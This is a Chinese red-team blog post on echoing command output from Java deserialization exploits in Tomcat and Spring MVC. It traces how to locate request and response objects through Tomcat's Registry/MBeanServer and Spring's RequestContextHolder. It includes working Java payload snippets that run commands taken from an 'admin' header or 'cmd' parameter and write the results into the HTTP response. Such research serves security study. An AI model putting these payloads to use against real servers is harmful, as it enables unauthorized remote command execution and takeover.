shell变量接收命令回显_JAVA反序列化基于常见框架_中间件回显方案

这是 酒仙桥六号部队 的第 68 篇文章。

全文共计2194个字,预计阅读时长8分钟。

概述

JAVA反序列化漏洞是JAVA中最常见的可以直接获取目标权限的漏洞,通过反序列化回显的思路也是越来越多,如通过远程加载回显、在目标网站写文件、通过URLClassLoader回显、借助dnslog回显等。这些思路多少都有些瓶颈。一旦遇到了目标因网络策略严格无法出网,则需要借助Dnslog的打法效果会失效。如果可以直观的返回命令执行结果,那岂不是更香?

知识点
Tomcat处理流程

在tomcat自己实现的Servlet处打断点,观察tomcat调用栈大致执行流程:

acff8ca798ccd9205e0aaba6549ffc05.png

调用过程可以直接用下图直观显示:

39fc83bbcadf5a35579614934400d725.png

Connector用于接收请求并将接收的请求封装为Request和Response来具体处理,Connector实现流程大致为:Acceptor用于监听请求,并在Handler处接收Socket,Endpoint用来处理底层Socket的网络连接,Processor用于将Endpoint接收到的Socket封装成Request,Adapter用于将Request交给Container进行具体的处理。

SpringMVC处理流程      

SpringMVC中通过DispatcherServlet对http请求做初始化操作,在讲回显思路之前,先一讲下有SpringMVC框架和无框架下Tomcat的request以及response处理容器关系图。

Tomcat 普通的一个Servlet 的类的继承与实现关系:

5327039773ba6e97b71b9dd5d29f8fa1.png

首先通过web.xml配置servlet的处理类为DispatcherServlet,所有的请求都在这个类中处理。

cde875f22dcd5a0bc540df8e1f71f8a6.png

我们看一下DispatcherServlet的继承与实现关系:

1f5065ee83fdbd172eff045ccd631ed3.png

可以发现,Spring本质就是一个做了增强功能的Servlet,对比Tomcat,分别是增加了HttpServletBean,FrameworkServlet以及DispatcherServlet(web.xml配置的Servlet),根据当我们的请求到达SpringMVC,会通过DispatcherServlet处理,根据多态的特点,会优先调用springmvc框架增强实现的Servlet的方法进行请求处理以及Spring bean容器初始化等一系列操作,再之后就可以通过注解RequestMapping的方式进行对请求路由进行处理。

通用回显思路

既然知道了框架中的请求处理流程,那么回显思路也非常清晰了:

  1. 获取存储在公共变量中的Request与Response对象。

  2. 通过读取Request对象获取命令。

  3. 通过写入Response对象完成回显。

明确了回显思路,下面将介绍如何从spring/tomcat中找到我们想要的公共变量,并完成回显。

基于Tomcat回显方案

当反序列化触发时,无法像普通的Filter/Servlet一样,直接获取到Request与Response对象。因此,必须另想办法拿到这些对象,完成命令获取以及回显。

我们在本地启动一个webapp,打上断点进行调试,根据调用栈一路向上跟踪至req和res对象初始化的类Http11Processor。它的构造函数如下:

f3ac7bbcc1882ea1508a55f042bf6640.png

Http11Processor父类AbstractProcessor的构造函数中,初始化了Request与Response对象:

e4115de8c7cc96d2b0939cfbeae77d51.png

在AbstractProcessor中可以通过getRequest获取当前req:

7756319e82c43161124b7fe6ea5310a6.png

在Request中有getResponse方法:

153148755b8937dd7da190f9076a6e54.png

如果想返回内容,则调用链路为:

Http11Processor.getRequest() -> Request.getResponse() ->Response.doWrite()

21758765b3c06dbbfc20680f2a86f196.png

那么如何获取Http11Processor?通过调用栈可以发现,AbstractProtocol处调用了createProcessor:

519e39e61431e5e281af4ead6da1bb50.png

c5a0bb1e9262b970eb8c884ab30f99ae.png

接下来就是如何获取processor,向上跟踪发现AbstractProtocol中process初始化了process:

5cfd4101e5b83525f8e8875213c9daf3.png

如果processor为空,则创建processor,并且将调用register方法注册,跟进register。

此处有两处分别进行了注册动作,一次是注册到当前线程变量global中,另一次则是注册到tomcat服务器的register注册表中:

7136e5b49b7c02960843b1d8c0bf14cc.png

接下来的思路则是获取Registry注册进去的RequestInfo。在Registry类中可以看到提供了getMBeanServer方法,返回一个MBeanServer对象:

69fdd6bd166919b94f565fb27124c48e.png

断点打在第233行,经调试发现运行状态下这个MBeanServer的实现类是JmxMBeanServer,类的实现关系如下:

c54f72d680cdf15a9bbe569b546012af.png

在JmxMBeanServer发现变量mbsInterceptor为实际存储MBean的变量:

ccdeff3e9346fff12a99a6997afa7fbc.png

再次断点调试,发现mbsInterceptor的实现类为DefaultMBeanServerInterceptor:

ee47b953b281e1b3627741ae33ef509e.png

在Repository可以找到一个query方法,能够返回一个查询列表:

a45b19714e0895320778ab311ead1b65.png

所以最终的调用思路为:

1 从Registry中获取到所有已注册的Http11Processor。

2 根据Request请求头中我们自己定义的字段去找到当前的Processor。

3 从当前的Processor获取到对应的Request对象。

4 执行系统命令,写入到Request.getResponse。

主要代码:

ArrayList processors = (ArrayList) field.get ( resource );field = Class.forName ( "org.apache.coyote.RequestInfo" ).getDeclaredField ( "req" );field.setAccessible ( true );for (int i = 0; i < processors.size (); i++) {    Request request = (Request) field.get ( processors.get ( i ) );    String header = request.getHeader ( "admin");    if (header != null && !header.equals ( "" )) {        String[] cmds = new String[]{"/bin/bash", "-c", header};        InputStream in = Runtime.getRuntime ().exec ( cmds ).getInputStream ();        Scanner s = new Scanner ( in ).useDelimiter ( "\\a" );        String out = "";        while (s.hasNext ()) {            out += s.next ();      }    byte[] buf = out.getBytes ();    ByteBuffer byteBuffer = ByteBuffer.wrap ( buf );    request.getResponse ().doWrite ( byteBuffer );    request.getResponse ().getBytesWritten ( true ); } }

运行效果:

6e6b2a1fd4490b1414d039b97c3eb7e1.png

基于Spring MVC的回显方案

在Spring MVC框架中,我们可以通过Spring RequestContextHolder直接获取请求信息,比tomcat的方案要简单许多。

debug一个Spring MVC程序,将断点设置在get请求方法上。跟踪断点处的调用栈可以发现,FrameworkServlet继承了HttpServletBean,并且调用了processRequest方法对request和response进行处理。

9e4741ae3a317157aa36ccecc2727f2b.png

下一步来到FrameworkServlet类,它调用自身initContextHolders方法,将保存了Request与Response对象的requestAttributes,设置到一个线程变量中:

f3fbb573a3555fac2fe8ac08826abc79.png

继续跟进initContextHolders,观察到requestAttributes在513行被引用:

b8c44e4739facd07bc78088cec72d8ef.png

跟进到RequestContextHolder中的setRequestAttributes方法,可以看到变量被赋值到RequestContextHolder类的requestAttributesHolder静态成员中。也就是说,通过查询这个成员的内容,我们就能获取到当前线程中的Request与Response对象:

c7093ca89e2eaa6a82e474996ff71042.png

观察RequestAttributesHolder类,发现可以直接通过调用对应的get方法获取requestAttributes对象:

60762f9c2042150db571ed32417d4201.png

整理思路如下:

  1. 获取RequestContextHolder类中的Attributes;

  2. 获取Attributes中的请求和响应对象:

  3. 通过反射执行命令后写入响应对象。

具体实现代码如下:

     HttpServletRequest httprequest =((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getRequest();            HttpServletResponse httpresponse = ((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getResponse();            String resHeader=httprequest.getParameter ( "cmd" );            java.io.InputStream in = java.lang.Runtime.getRuntime().exec(resHeader).getInputStream();            BufferedReader br = null;            br = new BufferedReader (new InputStreamReader (in, "GBK"));            String line;            StringBuilder sb = new StringBuilder();            while ((line = br.readLine()) != null) {                sb.append(line);                sb.append("\n");            }            java.io.PrintWriter out = new java.io.PrintWriter(httpresponse.getOutputStream());            out.write(sb.toString ());            out.flush();            out.close();

搭建一个简单的环境测试:

5051dced4b616d5ee69b90f6db4c4fca.png

搭建简单的反序列化环境测试:

1dca1661865e628d751217095a83c94d.png

总结

无论是中间件还是使用的web框架,在反序列化回显方面其共同特点都是寻找存储request以及response的类或变量 。只不过tomcat的变量传递和调用更为底层,寻找过程较为复杂;spring调用栈更靠后一些,获取request以及response链路稍微简单一些,整体思路大同小异。

参考链接:

https://xz.aliyun.com/t/7535https://www.codercto.com/a/112362.htmlhttps://mp.weixin.qq.com/s/-ODg9xL838wro2S_NK30bwhttps://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&mid=2651374294&idx=3&sn=82d050ca7268bdb7bcf7ff7ff293d7b3

861ec1a454ea83d1df04f5a769b4a1e3.png

08cd6fa0583c6b9a058aed266bc4e53e.png

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值